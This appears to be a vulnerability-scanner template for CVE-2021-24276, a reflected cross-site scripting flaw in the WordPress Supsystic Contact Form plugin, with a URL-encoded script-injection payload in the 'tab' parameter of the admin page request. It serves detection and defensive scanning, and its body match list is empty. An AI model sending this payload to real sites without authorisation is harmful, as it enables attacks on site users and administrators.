id: CVE-2021-24276 info: name: WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting author: dhiyaneshDK severity: medium description: WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute. reference: - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c - http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2021-24276 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24276 cwe-id: CWE-79 epss-score: 0.00177 cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 framework: wordpress vendor: supsystic product: contact_form tags: wordpress,cve,cve2021,wp-plugin,wpscan,packetstorm http: - method: GET path: - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: header words: - "text/html" - type: status status: - 200